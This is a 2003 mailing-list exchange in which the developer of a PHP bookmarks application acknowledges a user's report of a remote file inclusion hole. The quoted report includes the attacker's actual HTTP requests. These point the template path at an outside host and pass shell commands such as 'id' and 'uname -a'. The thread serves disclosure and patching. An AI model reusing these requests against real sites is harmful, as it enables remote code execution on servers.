From: L. B. S. <st...@lb...> - 2003-03-09 23:00:35
|
Hey Stefan, Thank you for pointing this out. This is the first we've heard of this vulnerability. I'll put a warning on the APB website and I'll release a patch as soon as I can. Thanks, Brandon -- L. Brandon Stone st...@lb... http://www.lbstone.com/ > -----Original Message----- > From: apb...@li... [mailto:apb-development- > ad...@li...] On Behalf Of Stefan May > Sent: Sunday, March 09, 2003 12:43 PM > To: apb...@li... > Subject: [Apb-development] Security Bug > > Hi all, > > I'm not subscribed to this list, so reply with Cc to me. > > Last night my site was hacked using PHP bookmarks. I like this > program very much, but this time I hated it. > > The "bug" is in /bookmarks/templates/head.php, you can set the > include path through normal http requests. The following requests > were made: > > GET > /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www .m > adsk8er.hpg.com.br/&cmd=id HTTP/1.1 > GET > /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www .m > adsk8er.hpg.com.br/&cmd=uname%20-a HTTP/1.1 > > and some more. For now I limited access to the template path. > I'm not sure if I should use Safe Mode for PHP. Is this the better way? > > cu, Stefan. > > |